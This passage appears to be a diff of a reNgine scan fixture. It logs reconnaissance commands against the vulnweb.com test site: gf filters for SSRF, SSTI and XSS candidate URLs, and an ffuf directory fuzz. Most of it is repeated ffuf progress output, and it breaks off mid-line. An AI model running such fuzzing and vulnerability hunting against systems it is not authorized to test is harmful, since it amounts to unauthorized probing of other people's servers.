/home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/gf_patterns_ssrf.txt", + "return_code": 1, + "output": "", + "time": "2024-11-13T02:34:16.746Z" } }, { - "model": "startScan.directoryfile", - "pk": 39, + "model": "startScan.command", + "pk": 92, "fields": { - "length": 4018, - "lines": 74, - "http_status": 200, - "words": 482, - "name": "aW5kZXguaHRtbA==", - "url": "http://www.vulnweb.com/index.html", - "content_type": "text/html" + "scan_history": 1, + "activity": 5, + "command": "cat /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/#1_fetch_url.txt | gf ssti | grep -Eo 'https?://www\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' >> /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/gf_patterns_ssti.txt", + "return_code": 0, + "output": "", + "time": "2024-11-13T02:34:16.775Z" } }, { - "model": "startScan.directoryscan", - "pk": 1, + "model": "startScan.command", + "pk": 93, "fields": { - "command_line": "ffuf -w /home/rengine/wordlists/fuzz-Bo0oM.txt -p 0.05 -t 30 -timeout 5 -ac -mc 200,204 -u http://rest.vulnweb.com/FUZZ -json", - "scanned_date": "2024-09-03T22:02:45.119Z", - "directory_files": [ - 1, - 2, - 3 - ], - "dir_subscan_ids": [] + "scan_history": 1, + "activity": 5, + "command": "cat /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/#1_fetch_url.txt | gf xss | grep -Eo 'https?://www\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' >> /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/gf_patterns_xss.txt", + "return_code": 0, + "output": "", + "time": "2024-11-13T02:34:16.816Z" } }, { - "model": "startScan.directoryscan", - "pk": 2, + "model": "startScan.command", + "pk": 94, "fields": { - "command_line": "ffuf -w /home/rengine/wordlists/fuzz-Bo0oM.txt -p 0.05 -t 30 -timeout 5 -ac -mc 200,204 -u http://testasp.vulnweb.com/FUZZ -json", - "scanned_date": "2024-09-03T22:05:24.142Z", - "directory_files": [ - 4, - 5, - 6 - ], - "dir_subscan_ids": [] + "scan_history": 1, + "activity": 6, + "command": "ffuf -w /home/rengine/wordlists/fuzz-Bo0oM.txt -p 0.05 -t 30 -timeout 5 -ac -mc 200,204 -u http://rest.vulnweb.com/FUZZ -json", + "return_code": 0, + "output": "\n /'___\\ /'___\\ /'___\\ \n /\\ \\__/ /\\ \\__/ __ __ /\\ \\__/ \n \\ \\ ,__\\\\ \\ ,__\\/\\ \\/\\ \\ \\ \\ ,__\\ \n \\ \\ \\_/ \\ \\ \\_/\\ \\ \\_\\ \\ \\ \\ \\_/ \n \\ \\_\\ \\ \\_\\ \\ \\____/ \\ \\_\\ \n \\/_/ \\/_/ \\/___/ \\/_/ \n\n v2.1.0-dev\n________________________________________________\n\n :: Method : GET\n :: URL : http://rest.vulnweb.com/FUZZ\n :: Wordlist : FUZZ: /home/rengine/wordlists/fuzz-Bo0oM.txt\n :: Follow redirects : false\n :: Calibration : true\n :: Timeout : 5\n :: Threads : 30\n :: Delay : 0.05 seconds\n :: Matcher : Response status: 200,204\n________________________________________________\n\n\n\u001b[2K:: Progress: [30/4842] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::\n\u001b[2K:: Progress: [30/4842] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::\n\u001b[2K:: Progress: [30/4842] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::\n\u001b[2K:: Progress: [30/4842] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::\n\u001b[2K:: Progress: [30/4842] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::\n\u001b[2K:: Progress: [30/4842] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::\n\u001b[2K:: Progress: [30/4842] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::\n\u001b[2K:: Progress: [30/4842] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::\n\u001b[2K:: Progress: [47/4842] :: Job [1/1] :: 283 req/sec :: Duration: [0:00:01] :: Errors: 0 ::\n\u001b[2K:: Progress: [50/4842] :: Job [1/1] :: 91 req/sec :: Duration: [0:00:01] :: Errors: 0 ::\n\u001b[2K:: Progress: [60/4842] :: Job [1/1] :: 86 req/sec :: Duration: [0:00:01] :: Errors: 0 ::\n\u001b[2K:: Progress: [71/4842] :: Job [1/1] :: 86 req/sec :: Duration: [0:00:01] :: Errors: 0 ::\n\u001b[2K:: Progress: [82/4842] :: Job [1/1] :: 88 req/sec :: Duration: [0:00:01] :: Errors: 0 ::\n\u001b[2K:: Progress: [90/4842] :: Job [1/1] :: 82 req/sec :: Duration: [0:00:01] :: Errors: 0 ::\n\u001b[2K:: Progress: [95/4842] :: Job [1/1] :: 76 req/sec :: Duration: [0:00:01] :: Errors: 0 ::\n\u001b[2K:: Progress: [100/4842] :: Job [1/1] :: 71 req/sec :: Duration: [0:00:01] :: Errors: 0 ::\n\u001b[2K:: Progress: [107/4842] :: Job [1/1] :: 70 req/sec :: Duration: [0:00:02] :: Errors: 0 ::\n\u001b[2K:: Progress: [113/4842] :: Job [1/1] :: 68 req/sec :: Duration: [0:00:02] :: Errors: 0 ::\n\u001b[2K:: Progress: [120/4842] :: Job [1/1] :: 68 req/sec :: Duration: [0:00:02] :: Errors: 0 ::\n\u001b[2K:: Progress: [131/4842] :: Job [1/1] :: 68 req/sec :: Duration: [0:00:02] :: Errors: 0 ::\n\u001b[2K:: Progress: [139/4842] :: Job [1/1] :: 68 req/sec :: Duration: [0:00:02] :: Errors: 0 ::\n\u001b[2K:: Progress: [147/4842] :: Job [1/1] :: 67 req/sec :: Duration: [0:00:02] :: Errors: 0 ::\n\u001b[2K:: Progress: [154/4842] :: Job [1/1] :: 67 req/sec :: Duration: [0:00:02] :: Errors: 0 ::\n\u001b[2K:: Progress: [166/4842] :: Job [1/1] :: 68 req/sec :: Duration: [0:00:02] :: Errors: 0 ::\n\u001b[2K:: Progress: [171/4842] :: Job [1/1] :: 67 req/sec :: Duration: [0:00:03] :: Errors: 0 ::\n\u001b[2K:: Progress: [185/4842] :: Job [1/1] :: 67 req/sec :: Duration: [0:00:03] :: Errors: 0 ::\n\u001b[2K:: Progress: [188/4842] :: Job [1/1] :: 63 req/sec :: Duration: [0:00:03] :: Errors: 0 ::\n\u001b[2K:: Progress: [198/4842] :: Job [1/1] :: 66 req/sec :: Duration: [0:00:03] :: Errors: 0 ::\n\u001b[2K:: Progress: [211/4842] :: Job [1/1] :: 66 req/sec :: Duration: [0:00:03] :: Errors: 0 ::\n\u001b[2K:: Progress: [219/4842] :: Job [1/1] :: 66 req/sec :: Duration: [0:00:03] :: Errors: 0 ::\n\u001b[2K:: Progress: [232/4842] :: Job [1/1] :: 66 req/sec :: Duration: [0:00:03] :: Errors: 0 ::\n\u001b[2K:: Progress: [244/4842] :: Job [1/1] :: 70 req/sec :: Duration: [0:00:03] :: Errors: 0 ::\n\u001b[2K:: Progress: [262/4842] :: Job [1/1] :: 78 req/sec :: Duration: [0:00:04] :: Errors: 0 ::\n\u001b[2K:: Progress: [270/4842] :: Job [1/1] :: 80 req/sec :: Duration: [0:00:04] :: Errors: 0 ::\n\u001b[2K:: Progress: [289/4842] :: Job [1/1] :: 85 req/sec :: Duration: [0:00:04] :: Errors: 0 ::\n\u001b[2K:: Progress: [298/4842] :: Job [1/1] :: 88 req/sec :: Duration: [0:00:04] :: Errors: 0 ::\n\u001b[2K:: Progress: [305/4842] :: Job [1/1] :: 85 req/sec :: Duration: [0:00:04] :: Errors: 0 ::\n\u001b[2K:: Progress: [322/4842] :: Job [1/1] :: 93 req/sec :: Duration: [0:00:04] :: Errors: 0 ::\n\u001b[2K:: Progress: [325/4842] :: Job [1/1] :: 86 req/sec :: Duration: [0:00:04] :: Errors: 0 ::\n\u001b[2K:: Progress: [342/4842] :: Job [1/1] :: 93 req/sec :: Duration: [0:00:04] :: Errors: 0 ::\n\u001b[2K:: Progress: [344/4842] :: Job [1/1] :: 88 req/sec :: Duration: [0:00:05] :: Errors: 0 ::\n\u001b[2K:: Progress: [349/4842] :: Job [1/1] :: 85 req/sec :: Duration: [0:00:05] :: Errors: 0 ::\n\u001b[2K:: Progress: [355/4842] :: Job [1/1] :: 83 req/sec :: Duration: [0:00:05] :: Errors: 0 ::\n\u001b[2K:: Progress: [364/4842] :: Job [1/1] :: 83 req/sec :: Duration: [0:00:05] :: Errors: 0 ::\n\u001b[2K:: Progress: [374/4842] :: Job [1/1] :: 82 req/sec :: Duration: [0:00:05] :: Errors: 0 ::\n\u001b[2K:: Progress: [379/4842] :: Job [1/1] :: 78 req/sec :: Duration: [0:00:05] :: Errors: 0 ::\n\u001b[2K:: Progress: [388/4842] :: Job [1/1] :: 76 req/sec :: Duration: [0:00:05] :: Errors: 0 ::\n\u001b[2K:: Progress: [394/4842] :: Job [1/1] :: 74 req/sec :: Duration: [0:00:05] :: Errors: 0 ::\n\u001b[2K:: Progress: [398/4842] :: Job [1/1] :: 71 req/sec :: Duration: [0:00:06] :: Errors: 0 ::\n\u001b[2K:: Progress: [400/4842] :: Job [1/1] :: 67 req/sec :: Duration: [0:00:06] :: Errors: 0 ::\n\u001b[2K:: Progress: [400/4842] :: Job [1/1] :: 67 req/sec :: Duration: [0:00:06] :: Errors: 0 ::\n\u001b[2K:: Progress: [404/4842] :: Job [1/1] :: 62 req/sec :: Duration: [0:00:06] :: Errors: 0 ::\n\u001b[2K:: Progress: [406/4842] :: Job [1/1] :: 61 req/sec :: Duration: [0:00:06] :: Errors: 0 ::\n\u001b[2K:: Progress: [409/4842] :: Job [1/1] :: 58 req/sec :: Duration: [0:00:06] :: Errors: 0 ::\n\u001b[2K:: Progress: [410/4842] :: Job [1/1] :: 55 req/sec :: Duration: [0:00:06] :: Errors: 0 ::\n\u001b[2K:: Progress: [415/4842] :: Job [1/1] :: 52 req/sec :: Duration: [0:00:06] :: Errors: 0 ::\n\u001b[2K:: Progress: [422/4842] :: Job [1/1] :: 52 req/sec :: Duration: [0:00:07] :: Errors: 0 ::\n\u001b[2K:: Progress: [430/4842] :: Job [1/1] :: 51 req/sec :: Duration: [0:00:07] :: Errors: 0 ::\n\u001b[2K:: Progress: [435/4842] :: Job [1/1] :: 49 req/sec :: Duration: [0:00:07] :: Errors: 0 ::\n\u001b[2K:: Progress: [436/4842] :: Job [1/1] :: 47 req/sec :: Duration: [0:00:07] :: Errors: 0 ::\n\u001b[2K:: Progress: [438/4842] :: Job [1/1] :: 45 req/sec :: Duration: [0:00:07] :: Errors: 0 ::\n\u001b[2K:: Progress: [440/4842] :: Job [1/1] :: 44 req/sec :: Duration: [0:00:07] :: Errors: 0 ::\n\u001b[2K:: Progress: [446/4842] :: Job [1/1] :: 43 req/sec :: Duration: [0:00:07] :: Errors: 0 ::\n\u001b[2K:: Progress: [451/4842] :: Job [1/1] :: 43 req/sec :: Duration: [0:00:07] :: Errors: 0 ::\n\u001b[2K:: Progress: [455/4842] :: Job [1/1] :: 42 req/sec :: Duration: [0:00:08] :: Errors: 0 ::\n\u001b[2K:: Progress: [460/4842] :: Job [1/1] :: 41 req/sec :: Duration: [0:00:08] :: Errors: 0 ::\n\u001b[2K:: Progress: [461/4842] :: Job [1/1] :: 41 req/sec :: Duration: [0:00:08] :: Errors: 0 ::\n\u001b[2K:: Progress: [462/4842] :: Job [1/1] :: 39 req/sec :: Duration: [0:00:08] :: Errors: 0 ::\n\u001b[2K:: Progress: [464/4842] :: Job [1/1] :: 38 req/sec :: Duration: [0:00:08] :: Errors: 0 ::\n\u001b[2K:: Progress: [466/4842] :: Job [1/1] :: 37 req/sec :: Duration: [0:00:08] :: Errors: 0 ::\n\u001b[2K:: Progress: [469/4842] :: Job [1/1] :: 36 req/sec :: Duration: [0:00:08] :: Errors: 0 ::\n\u001b[2K:: Progress: [472/4842] :: Job [1/1] :: 35 req/sec :: Duration: [0:00:08] :: Errors: 0 ::\n\u001b[2K:: Progress: [478/4842] :: Job [1/1] :: 35 req/sec :: Duration: [0:00:09] :: Errors: 0 ::\n\u001b[2K:: Progress: [481/4842] :: Job [1/1] :: 34 req/sec :: Duration: [0:00:09] :: Errors: 0 ::\n\u001b[2K:: Progress: [482/4842] :: Job [1/1] :: 33 req/sec :: Duration: [0:00:09] :: Errors: 0 ::\n\u001b[2K:: Progress: [486/4842] :: Job [1/1] :: 32 req/sec :: Duration: [0:00:09] :: Errors: 0 ::\n\u001b[2K:: Progress: [488/4842] :: Job [1/1] :: 31 req/sec :: Duration: [0:00:09] :: Errors: 0 ::\n\u001b[2K:: Progress: [488/4842] :: Job [1/1] :: 31 req/sec :: Duration: [0:00:09] :: Errors: 0 ::\n\u001b[2K:: Progress: [490/4842] :: Job [1/1] :: 30 req/sec :: Duration: [0:00:09] :: Errors: 0 ::\n\u001b[2K:: Progress: [491/4842] :: Job [1/1] :: 30 req/sec :: Duration: [0:00:09] :: Errors: 0 ::\n\u001b[2K:: Progress: [496/4842] :: Job [1/1] :: 30 req/sec :: Duration: [0:00:10] :: Errors: 0 ::\n\u001b[2K:: Progress: [499/4842] :: Job [1/1] :: 30 req/sec :: Duration: [0:00:10] :: Errors: 0 ::\n\u001b[2K:: Progress: [502/4842] :: Job [1/1] :: 29 req/sec :: Duration: [0:00:10] :: Errors: 0 ::\n\u001b[2K:: Progress: [503/4842] :: Job [1/1] :: 29 req/sec :: Duration: [0:00:10] :: Errors: 0 ::\n\u001b[2K:: Progress: [506/4842] :: Job [1/1] :: 28 req/sec :: Duration: [0:00:10] :: Errors: 0 ::\n\u001b[2K:: Progress: [508/4842] :: Job [1/1] :: 27 req/sec :: Duration: [0:00:10] :: Errors: 0 ::\n\u001b[2K:: Progress: [508/4842] :: Job [1/1] :: 27 req/sec :: Duration: [0:00:10] :: Errors: 0 ::\n\u001b[2K:: Progress: [509/4842] :: Job [1/1] :: 27 req/sec :: Duration: [0:00:10] :: Errors: 0 ::\n\u001b[2K:: Progress: [509/4842] :: Job [1/1] :: 27 req/sec :: Duration: [0:00:11] :: Errors: 0 ::\n\u001b[2K:: Progress: [510/4842] :: Job [1/1] :: 25 req/sec :: Duration: [0:00:11] :: Errors: 0 ::\n\u001b[2K:: Progress: [512/4842] :: Job [1/1] :: 25 req/sec :: Duration: [0:00:11] :: Errors: 0 ::\n\u001b[2K:: Progress: [517/4842] :: Job [1/1] :: 25 req/sec :: Duration: [0:00:11] :: Errors: 0 ::\n\u001b[2K:: Progress: [518/4842] :: Job [1/1] :: 24 req/sec :: Duration: [0:00:11] :: Errors: 0 ::\n\u001b[2K:: Progress: [520/4842] :: Job [1/1] :: 24 req/sec :: Duration: [0:00:11] :: Errors: 0 ::\n\u001b[2K:: Progress: [522/4842] :: Job [1/1] :: 24 req/sec :: Duration: [0:00:11] :: Errors: 0 ::\n\u001b[2K:: Progress: [523/4842] :: Job [1/1] :: 23 req/sec :: Duration: [0:00:11] :: Errors: 0 ::\n\u001b[2K:: Progress: [523/4842] :: Job [1/1] :: 23 req/sec :: Duration: [0:00:12] :: Errors: 0 ::\n\u001b[2K:: Progress: [524/4842] :: Job [1/1] :: 22 req/sec :: Duration: [0:00:12] :: Errors: 0 ::\n\u001b[2K:: Progress: [525/4842] :: Job [1/1] :: 22 req/sec :: Duration: [0:00:12] :: Errors: 0 ::\n\u001b[2K:: Progress: [525/4842] :: Job [1/1] :: 22 req/sec :: Duration: [0:00:12] :: Errors: 0 ::\n\u001b[2K:: Progress: [527/4842] :: Job [1/1] :: 21 req/sec :: Duration: [0:00:12] :: Errors: 0 ::\n\u001b[2K:: Progress: [529/4842] :: Job [1/1] :: 21 req/sec :: Duration: [0:00:12] :: Errors: 0 ::\n\u001b[2K:: Progress: [529/4842] :: Job [1/1] :: 21 req/sec :: Duration: [0:00:12] :: Errors: 0 ::\n\u001b[2K:: Progress: [530/4842] :: Job [1/1] :: 20 req/sec :: Duration: [0:00:12] :: Errors: 0 ::\n\u001b[2K:: Progress: [532/4842] :: Job [1/1] :: 20 req/sec :: Duration: [0:00:13] :: Errors: 0 ::\n\u001b[2K:: Progress: [534/4842] :: Job [1/1] :: 20 req/sec :: Duration: [0:00:13] :: Errors: 0 ::\n\u001b[2K:: Progress: [537/4842] :: Job [1/1] :: 19 req/sec :: Duration: [0:00:13] :: Errors: 0 ::\n\u001b[2K:: Progress: [537/4842] :: Job [1/1] :: 19 req/sec :: Duration: [0:00:13] :: Errors: 0 ::\n\u001b[2K:: Progress: [537/4842] :: Job [1/1] :: 19 req/sec :: Duration: [0:00:13] :: Errors: 0 ::\n\u001b[2K:: Progress: [537/4842] :: Job [1/1] :: 19 req/sec :: Duration: [0:00:13] :: Errors: 0 ::\n\u001b[2K:: Progress: [537/4842] :: Job [1/1] :: 19 req/sec :: Duration: [0:00:13] :: Errors: 0 ::\n\u001b[2K:: Progress: [537/4842] :: Job [1/1] :: 19 req/sec :: Duration: [0:00:13] :: Errors: 0 ::\n\u001b[2K:: Progress: [538/4842] :: Job [1/1] :: 18 req/sec :: Duration: [0:00:14] :: Errors: 0 ::\n\u001b[2K:: Progress: [539/4842] :: Job [1/1] :: 18 req/sec :: Duration: [0:00:14] :: Errors: 0 ::\n\u001b[2K:: Progress: [540/4842] :: Job [1/1] :: 17 req/sec :: Duration: [0:00:14] :: Errors: 0 ::\n\u001b[2K:: Progress: [540/4842] :: Job [1/1] :: 17 req/sec :: Duration: [0:00:14] :: Errors: 0 ::\n\u001b[2K:: Progress: [541/4842] :: Job [1/1] :: 17 req/sec :: Duration: [0:00:14] :: Errors: 0 ::\n\u001b[2K:: Progress: [542/4842] :: Job [1/1] :: 17 req/sec :: Duration: [0:00:14] :: Errors: 0 ::\n\u001b[2K:: Progress: [542/4842] :: Job [1/1] :: 17 req/sec :: Duration: [0:00:14] :: Errors: 0 ::\n\u001b[2K:: Progress: [547/4842] :: Job [1/1] :: 16 req/sec :: Duration: [0:00:14] :: Errors: 0 ::\n\u001b[2K:: Progress: [547/4842] :: Job [1/1] :: 16 req/sec :: Duration: [0:00:15] :: Errors: 0 ::\n\u001b[2K:: Progress: [548/4842] :: Job [1/1] :: 16 req/sec :: Duration: [0:00:15] :: Errors: 0 ::\n\u001b[2K:: Progress: [549/4842] :: Job [1/1] :: 16 req/sec :: Duration: [0:00:15] :: Errors: 0 ::\n\u001b[2K:: Progress: [550/4842] :: Job [1/1] :: 16 req/sec :: Duration: [0:00:15] :: Errors: 0 ::\n\u001b[2K:: Progress: [550/4842] :: Job [1/1] :: 16 req/sec :: Duration: [0:00:15] :: Errors: 0 ::\n\u001b[2K:: Progress: [551/4842] :: Job [1/1] :: 16 req/sec :: Duration: [0:00:15] :: Errors: 0 ::\n\u001b[2K:: Progress: [551/4842] :: Job [1/1] :: 16 req/sec :: Duration: [0:00:15] :: Errors: 0 ::\n\u001b[2K:: Progress: [552/4842] :: Job [1/1] :: 15 req/sec :: Duration: [0:00:15] :: Errors: 0 ::\n\u001b[2K:: Progress: [552/4842] :: Job [1/1] :: 15 req/sec :: Duration: [0:00:16] :: Errors: 0 ::\n\u001b[2K:: Progress: [552/4842] :: Job [1/1] :: 15 req/sec :: Duration: [0:00:16] :: Errors: 0 ::\n\u001b[2K:: Progress: [553/4842] :: Job [1/1] :: 15 req/sec :: Duration: [0:00:16] :: Errors: 0 ::\n\u001b[2K:: Progress: [555/4842] :: Job [1/1] :: 14 req/sec :: Duration: [0:00:16] :: Errors: 0 ::\n\u001b[2K:: Progress: [556/4842] :: Job [1/1] :: 15 req/sec :: Duration: [0:00:16] :: Errors: 0 ::\n\u001b[2K:: Progress: [556/4842] :: Job [1/1] :: 15 req/sec :: Duration: [0:00:16] :: Errors: 0 ::\n\u001b[2K:: Progress: [557/4842] :: Job [1/1] :: 14 req/sec :: Duration: [0:00:16] :: Errors: 0 ::\n\u001b[2K:: Progress: [557/4842] :: Job [1/1] :: 14 req/sec :: Duration: [0:00:16] :: Errors: 0 ::\n\u001b[2K:: Progress: [558/4842] :: Job [1/1] :: 14 req/sec :: Duration: [0:00:17] :: Errors: 0 ::\n\u001b[2K:: Progress: [558/4842] :: Job [1/1] :: 14 req/sec :: Duration: [0:00:17] :: Errors: 0 ::\n\u001b[2K:: Progress: [558/4842] :: Job [1/1] :: 14 req/sec :: Duration: [0:00:17] :: Errors: 0 ::\n\u001b[2K:: Progress: [558/4842] :: Job [1/1] :: 14 req/sec :: Duration: [0:00:17] :: Errors: 0 ::\n\u001b[2K:: Progress: [558/4842] :: Job [1/1] :: 14 req/sec :: Duration: [0:00:17] :: Errors: 0 ::\n\u001b[2K:: Progress: [558/4842] :: Job [1/1] :: 14 req/sec :: Duration: [0:00:17] :: Errors: 0 ::\n\u001b[2K:: Progress: [558/4842] :: Job [1/1] :: 14 req/sec :: Duration: [0:00:17] :: Errors: 0 ::\n\u001b[2K:: Progress: [559/4842] :: Job [1/1] :: 13 req/sec :: Duration: [0:00:17] :: Errors: 0 ::\n\u001b[2K:: Progress: [559/4842] :: Job [1/1] :: 13 req/sec :: Duration: [0:00:18] :: Errors: 0 ::\n\u001b[2K:: Progress: [559/4842] :: Job [1/1] :: 13 req/sec :: Duration: [0:00:18] :: Errors: 0 ::\n\u001b[2K:: Progress: [560/4842] :: Job [1/1] :: 13 req/sec :: Duration: [0:00:18] :: Errors: 0 ::\n\u001b[2K:: Progress: [562/4842] :: Job [1/1] :: 13 req/sec :: Duration: [0:00:18] :: Errors: 0 ::\n\u001b[2K:: Progress: [562/4842] :: Job [1/1] :: 13 req/sec :: Duration: [0:00:18] :: Errors: 0 ::\n\u001b[2K:: Progress: [562/4842] :: Job [1/1] :: 13 req/sec :: Duration: [0:00:18] :: Errors: 0 ::\n\u001b[2K:: Progress: [562/4842] :: Job [1/1] :: 13 req/sec :: Duration: [0:00:18] :: Errors: 0 ::\n\u001b[2K:: Progress: [562/4842] :: Job [1/1] :: 13 req/sec :: Duration: [0:00:18] :: Errors: 0 ::\n\u001b[2K:: Progress: [562/4842] :: Job [1/1] :: 13 req/sec :: Duration: [0:00:19] :: Errors: 0 ::\n\u001b[2K:: Progress: [562/4842] :: Job [1/1] :: 13 req/sec :: Duration: [0:00:19] :: Errors: 0 ::\n\u001b[2K:: Progress: [562/4842] :: Job [1/1] :: 13 req/sec :: Duration: [0:00:19] :: Errors: 0 ::\n\u001b[2K:: Progress: [562/4842] :: Job [1/1] :: 13 req/sec :: Duration: [0:00:19] :: Errors: 0 ::\n\u001b[2K:: Progress: [562/4842] :: Job [1/1] :: 13 req/sec :: Duration: [0:00:19] :: Errors: 0 ::\n\u001b[2K:: Progress: [562/4842] :: Job [1/1] :: 13 req/sec :: Duration: [0:00:19] :: Errors: 0 ::\n\u001b[2K:: Progress: [562/4842] :: Job [1/1] :: 13 req/sec :: Duration: [0:00:19] :: Errors: 0 ::\n\u001b[2K:: Progress: [563/4842] :: Job [1/1] :: 11 req/sec :: Duration: [0:00:19] :: Errors: 0 ::\n\u001b[2K:: Progress: [565/4842] :: Job [1/1] :: 11 req/sec :: Duration: [0:00:20] :: Errors: 1 ::\n\u001b[2K:: Progress: [565/4842] :: Job [1/1] :: 11 req/sec :: Duration: [0:00:20] :: Errors: 1 ::\n\u001b[2K:: Progress: [565/4842] :: Job [1/1] :: 11 req/sec :: Duration: [0:00:20] :: Errors: 1 ::\n\u001b[2K:: Progress: [565/4842] :: Job [1/1] :: 11 req/sec :: Duration: [0:00:20] :: Errors: 1 ::\n\u001b[2K:: Progress: [565/4842] :: Job [1/1] :: 11 req/sec :: Duration: [0:00:20] :: Errors: 1 ::\n\u001b[2K:: Progress: [565/4842] :: Job [1/1] :: 11 req/sec :: Duration: [0:00:20] :: Errors: 1 ::\n\u001b[2K:: Progress: [565/4842] :: Job [1/1] :: 11 req/sec :: Duration: [0:00:20] :: Errors: 1 ::\n\u001b[2K:: Progress: [565/4842] :: Job [1/1] :: 11 req/sec :: Duration: [0:00:20] :: Errors: 1 ::\n\u001b[2K:: Progress: [565/4842] :: Job [1/1] :: 11 req/sec :: Duration: [0:00:21] :: Errors: 1 ::\n\u001b[2K:: Progress: [565/4842] :: Job [1/1] :: 11 req/sec :: Duration: [0:00:21] :: Errors: 1 ::\n\u001b[2K:: Progress: [565/4842] :: Job [1/1] :: 11 req/sec :: Duration: [0:00:21] :: Errors: 2 ::\n\u001b[2K:: Progress: [567/4842] :: Job [1/1] :: 10 req/sec :: Duration: [0:00:21] :: Errors: 3 ::\n\u001b[2K:: Progress: [569/4842] :: Job [1/1] :: 10 req/sec :: Duration: [0:00:21] :: Errors: 4 ::\n\u001b[2K:: Progress: [570/4842] :: Job [1/1] :: 10 req/sec :: Duration: [0:00:21] :: Errors: 5 ::\n\u001b[2K:: Progress: [570/4842] :: Job [1/1] :: 10 req/sec :: Duration: [0:00:21] :: Errors: 5 ::\n\u001b[2K:: Progress: [570/4842] :: Job [1/1] :: 10 req/sec :: Duration: [0:00:21] :: Errors: 5 ::\n\u001b[2K:: Progress: [570/4842] :: Job [1/1] :: 10 req/sec :: Duration: [0:00:22] :: Errors: 5 ::\n\u001b[2K:: Progress: [571/4842] :: Job [1/1] :: 9 req/sec :: Duration: [0:00:22] :: Errors: 6 ::\n\u001b[2K:: Progress: [571/4842] :: Job [1/1] :: 9 req/sec :: Duration: [0:00:22] :: Errors: 6 ::\n\u001b[2K:: Progress: [571/4842] :: Job [1/1] :: 9 req/sec :: Duration: [0:00:22] :: Errors: 7 ::\n\u001b[2K:: Progress: [572/4842] :: Job [1/1] :: 9 req/sec :: Duration: [0:00:22] :: Errors: 8 ::\n\u001b[2K:: Progress: [574/4842] :: Job [1/1] :: 9 req/sec :: Duration: [0:00:22] :: Errors: 9 ::\n\u001b[2K:: Progress: [574/4842] :: Job [1/1] :: 9 req/sec :: Duration: [0:00:22] :: Errors: 9 ::\n\u001b[2K:: Progress: [574/4842] :: Job [1/1] :: 9 req/sec :: Duration: [0:00:22] :: Errors: 9 ::\n\u001b[2K:: Progress: [575/4842] :: Job [1/1] :: 9 req/sec :: Duration: [0:00:23] :: Errors: 10 ::\n\u001b[2K:: Progress: [576/4842] :: Job [1/1] :: 9 req/sec :: Duration: [0:00:23] :: Errors: 11 ::\n\u001b[2K:: Progress: [577/4842] :: Job [1/1] :: 9 req/sec :: Duration: [0:00:23] :: Errors: 11 ::\n\u001b[2K:: Progress: [577/4842] :: Job [1/1] :: 9 req/sec :: Duration: [0:00:23] :: Errors: 11 ::\n\u001b[2K:: Progress: [577/4842] :: Job [1/1] :: 9 req/sec :: Duration: [0:00:23] :: Errors: 11 ::\n\u001b[2K:: Progress: [577/4842] :: Job [1/1] :: 9 req/sec :: Duration: [0:00:23] :: Errors: 11 ::\n\u001b[2K:: Progress: [577/4842] :: Job [1/1] :: 9 req/sec :: Duration: [0:00:23] :: Errors: 11 ::\n\u001b[2K:: Progress: [577/4842] :: Job [1/1] :: 9 req/sec :: Duration: [0:00:23] :: Errors: 11 ::\n\u001b[2K:: Progress: [578/4842] :: Job [1/1] :: 8 req/sec :: Duration: [0:00:24] :: Errors: 12 ::\n\u001b[2K:: Progress: [578/4842] :: Job [1/1] :: 8 req/sec :: Duration: [0:00:24] :: Errors: 13 ::\n\u001b[2K:: Progress: [579/4842] :: Job [1/1] :: 8 req/sec :: Duration: [0:00:24] :: Errors: 13 ::\n\u001b[2K:: Progress: [579/4842] :: Job [1/1] :: 8 req/sec :: Duration: [0:00:24] :: Errors: 13 ::\n\u001b[2K:: Progress: [579/4842] :: Job [1/1] :: 8 req/sec :: Duration: [0:00:24] :: Errors: 13 ::\n\u001b[2K:: Progress: [579/4842] :: Job [1/1] :: 8 req/sec :: Duration: [0:00:24] :: Errors: 13 ::\n\u001b[2K:: Progress: [580/4842] :: Job [1/1] :: 8 req/sec :: Duration: [0:00:24] :: Errors: 13 ::\n\u001b[2K:: Progress: [581/4842] :: Job [1/1] :: 8 req/sec :: Duration: [0:00:24] :: Errors: 15 ::\n\u001b[2K:: Progress: [582/4842] :: Job [1/1] :: 8 req/sec :: Duration: [0:00:25] :: Errors: 15 ::\n\u001b[2K:: Progress: [582/4842] :: Job [1/1] :: 8 req/sec :: Duration: [0:00:25] :: Errors: 15 ::\n\u001b[2K:: Progress: [582/4842] :: Job [1/1] :: 8 req/sec :: Duration: [0:00:25] :: Errors: 15 ::\n\u001b[2K:: Progress: [582/4842] :: Job [1/1] :: 8 req/sec :: Duration: [0:00:25] :: Errors: 15 ::\n\u001b[2K:: Progress: [582/4842] :: Job [1/1] :: 8 req/sec :: Duration: [0:00:25] :: Errors: 15 ::\n\u001b[2K:: Progress: [582/4842] :: Job [1/1] :: 8 req/sec :: Duration: [0:00:25] :: Errors: 15 ::\n\u001b[2K:: Progress: [582/4842] :: Job [1/1] :: 8 req/sec :: Duration: [0:00:25] :: Errors: 15 ::\n\u001b[2K:: Progress: [583/4842] :: Job [1/1] :: 8 req/sec :: Duration: [0:00:25] :: Errors: 16 ::\n\u001b[2K:: Progress: [583/4842] :: Job [1/1] :: 8 req/sec :: Duration: [0:00:26] :: Errors: 16 ::\n\u001b[2K:: Progress: [583/4842] :: Job [1/1] :: 8 req/sec :: Duration: [0:00:26] :: Errors: 16 ::\n\u001b[2K:: Progress: [584/4842] :: Job [1/1] :: 7 req/sec :: Duration: [0:00:26] :: Errors: 17 ::\n\u001b[2K:: Progress: [586/4842] :: Job [1/1] :: 7 req/sec :: Duration: [0:00:26] :: Errors: 20 